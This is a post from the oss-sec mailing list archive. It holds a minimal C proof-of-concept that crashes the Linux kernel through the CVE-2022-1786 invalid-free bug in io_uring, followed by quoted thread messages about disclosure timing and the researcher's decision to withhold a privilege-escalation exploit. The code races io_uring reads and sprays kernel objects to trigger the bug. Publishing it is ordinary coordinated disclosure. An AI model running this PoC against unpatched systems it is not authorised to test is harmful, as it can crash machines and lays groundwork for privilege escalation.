oss-sec mailing list archives

Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring


From: Kyle Zeng <zengyhkyle () gmail com>
Date: Sat, 28 May 2022 01:26:27 -0700

Hi all,

A minimal crashing PoC for CVE-2022-1786 is attached in the email.

Kyle

=-=-=-=-=-=-=-=
#define _GNU_SOURCE

#include <stdarg.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <assert.h>
#include <fcntl.h>
#include <linux/fs.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/timerfd.h>
#include <sys/xattr.h>

#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/io_uring.h>

// io_uring tutorial:
#define u64 unsigned long long
#define u32 unsigned int

# ifndef __NR_io_uring_setup
#  define __NR_io_uring_setup 425
# endif
# ifndef __NR_io_uring_enter
#  define __NR_io_uring_enter 426
# endif
# ifndef __NR_io_uring_register
#  define __NR_io_uring_register 427
# endif

int fd_io_uring;
#define GROOM_NUM 0x20
u64 cpu_num = 4;
u64 work_num = 0x200;
char fname[] = "/etc/passwd";
u64 heap_addr;
int target_shmid;
char timerfd_backup[0x100];
#define NAP_TIME1 50000
#define NAP_TIME2 50000

void set_cpu(int cpuid)
{
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(cpuid, &my_set);
    assert(sched_setaffinity(0, sizeof(my_set), &my_set) == 0);
}

void increase_limit()
{
    int ret;
    struct rlimit open_file_limit;

    /* Query current soft/hard value */
    ret = getrlimit(RLIMIT_NOFILE, &open_file_limit);
    assert(ret >= 0);

printf("[*] file limit: %d\n", open_file_limit.rlim_max);

    /* Set soft limit to hard limit */
    open_file_limit.rlim_cur = open_file_limit.rlim_max;
    ret = setrlimit(RLIMIT_NOFILE, &open_file_limit);
    assert(ret >= 0);
}

struct cq_ring_t {
    u32 *head;
    u32 *tail;
    u32 *ring_mask;
    u32 *ring_entries;
    struct io_uring_cqe *cqes;
};

struct sq_ring_t {
    u32 *head;
    u32 *tail;
    u32 *ring_mask;
    u32 *ring_entries;
    u32 *flags;
    u32 *array;
};

struct uring_mgr_t {
    int fd;
    struct sq_ring_t sq_ring;
    struct cq_ring_t cq_ring;
    struct io_uring_sqe *sqes;
};

#define IORING_OP_WRITE 23
#define IORING_OP_READ 22

struct uring_mgr_t mgr;
void uring_mgr_setup(struct uring_mgr_t *mgr, u32 entries)
{
    // create io_uring fd
    struct io_uring_params setup_params = {0};
    setup_params.flags = IORING_SETUP_IOPOLL;
    mgr->fd = syscall(__NR_io_uring_setup, entries, &setup_params);
    assert(mgr->fd >= 0);

    // map the ring buffer and the SQE(submission queue entry) buffer
    uint32_t sq_ring_sz = setup_params.sq_off.array +
setup_params.sq_entries * sizeof(uint32_t);
    uint32_t cq_ring_sz = setup_params.cq_off.cqes +
setup_params.cq_entries * sizeof(struct io_uring_cqe);
    uint32_t ring_sz = sq_ring_sz > cq_ring_sz ? sq_ring_sz : cq_ring_sz;
    uint32_t sqes_sz = setup_params.sq_entries * sizeof(struct
io_uring_sqe);
    void *ring_ptr = mmap(NULL, ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED
| MAP_POPULATE,
mgr->fd, IORING_OFF_SQ_RING);
mgr->sqes = (struct io_uring_sqe *) mmap(NULL, sqes_sz, PROT_READ |
PROT_WRITE,
MAP_SHARED | MAP_POPULATE, mgr->fd, IORING_OFF_SQES);
    assert((long)mgr->sqes >= 0);

    // now initialize the completion queue
    struct cq_ring_t *cq_ring = &mgr->cq_ring;
    cq_ring->head = (u32 *)((long )ring_ptr + setup_params.cq_off.head);
    cq_ring->tail = (u32 *)((long)ring_ptr + setup_params.cq_off.tail);
    cq_ring->ring_mask = (u32 *)((long)ring_ptr +
setup_params.cq_off.ring_mask);
    cq_ring->ring_entries = (u32 *)((long)ring_ptr +
setup_params.cq_off.ring_entries);
    cq_ring->cqes = (struct io_uring_cqe *)((long)ring_ptr +
setup_params.cq_off.cqes);

    // now initialize the submission queue
    struct sq_ring_t *sq_ring = &mgr->sq_ring;
    sq_ring->head = (u32 *)((long)ring_ptr + setup_params.sq_off.head);
    sq_ring->tail = (u32 *)((long)ring_ptr + setup_params.sq_off.tail);
    sq_ring->ring_mask = (u32 *)((long)ring_ptr +
setup_params.sq_off.ring_mask);
    sq_ring->ring_entries = (u32 *)((long)ring_ptr +
setup_params.sq_off.ring_entries);
    sq_ring->flags = (u32 *)((long)ring_ptr + setup_params.sq_off.flags);
    sq_ring->array = (u32 *)((long)ring_ptr + setup_params.sq_off.array);
}

int *flag;
u64 val;
u64 *val_ptr = &val;
u64 elapse_time[2];
void *func(void *arg) {
    int cpuid = (int)(long)arg;
    set_cpu(cpuid);
    while(*flag == 0);
    int ret = syscall(__NR_io_uring_enter, fd_io_uring, work_num/2,
work_num/2, 1);
    __atomic_fetch_add(&val, 1, __ATOMIC_SEQ_CST);
}


void trigger_free()
{
    uring_mgr_setup(&mgr, work_num);
    fd_io_uring = mgr.fd;
printf("fd_io_uring: %d\n", fd_io_uring);

    // open some file
    // fd = open("/etc/passwd", O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC);
    int fds[work_num];
puts(fname);
    for(int i=0; i<work_num; i++) {
        fds[i] = open(fname, O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC);
        assert(fds[i] >= 0);
    }
    printf("fd: %d\n", fds[0]);
    assert(fds[0] >= 0);

// SQE: submission queue entries
    // struct io_uring_sqe sqe = {
    //  .opcode = IORING_OP_WRITE,
    //  .flags = 0,
    //  .ioprio = 0,
    //  .fd = fd,
    //  .off = 0,
    //  .addr = 0,
    //  .len = 1,
    // };
    void *buf = mmap(NULL, 0x5000000, PROT_READ|PROT_WRITE,
MAP_ANON|MAP_PRIVATE, -1, 0);
    memset(buf, 'A', 0x5000000);

    struct io_uring_sqe sqe = {
        .opcode = IORING_OP_READ,
        .flags = 0,
        .ioprio = 0,
        .fd = -1,
        .off = 0,
        .addr = (u64)buf,
        .len = 0x5000000,
    };

    // now submit the request
    struct sq_ring_t *sq_ring = &mgr.sq_ring;
    struct cq_ring_t *cq_ring = &mgr.cq_ring;
    u32 index, tail, next_tail;
    next_tail = tail = *sq_ring->tail;
    next_tail++;
    // barrier();
    // copy the request to the sqe buffer
    index = tail & *mgr.sq_ring.ring_mask;
    for(int i=0; i<work_num; i++) {
        sqe.fd = fds[i];
        memcpy(&mgr.sqes[index+i], &sqe, sizeof(struct io_uring_sqe));
    }

    sq_ring->array[index] = index;
    tail = next_tail;
    assert(*sq_ring->tail != tail);
    *sq_ring->tail = work_num;

    set_cpu(2);

    pthread_t tids[2];
    int ret;
    for(int i=0; i<2; i++) {
        ret = pthread_create(&tids[i], NULL, func, i);
        assert(ret == 0);
    }
    *flag = 1;
    // sleep(1);
    while(*val_ptr != 2);
    pthread_join(tids[0], NULL);
    pthread_join(tids[1], NULL);

    // sleep(1000);
    execve("/", NULL, NULL);
    close(fd_io_uring);
    exit(0);
}

void attempt()
{
flag = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANON, -1, 0);
if(!fork()) {
trigger_free();
} else {
wait(NULL);
for(int i=0; i<0x100; i++) timerfd_create(CLOCK_REALTIME, 0);
}
}


int main() {

puts("========================================================================");

increase_limit();

set_cpu(0);

for(int i=0; i<10000; i++) {
printf("i: %d\n", i);
usleep(10000);
if(!fork()) attempt();
else {
wait(NULL);
}
}
puts("Done");
}
=-=-=-=-=-=-=-=

On Tue, May 24, 2022 at 9:28 AM Kyle Zeng <zengyhkyle () gmail com> wrote:

A small correction, I shared a minimal crashing PoC to linux-distros
but not the LPE exploit.
I do not plan to share the LPE exploit because of ethical issues.

To answer your question: I intend to post the crashing PoC on May
27th. Thanks for reminding me.

Kyle

On Tue, May 24, 2022 at 9:22 AM Solar Designer <solar () openwall com> wrote:

On Tue, May 24, 2022 at 09:10:37AM -0700, Kyle Zeng wrote:
# Impact
I wrote a proof-of-concept exploit and demonstrated that it can be
used to achieve local privilege escalation.

Since you shared the PoC exploit with linux-distros, you're supposed to
also post that to oss-security within 7 days of your first posting
above, so by or on May 31.  Do you intend to, and when exactly?

Alexander


Current thread: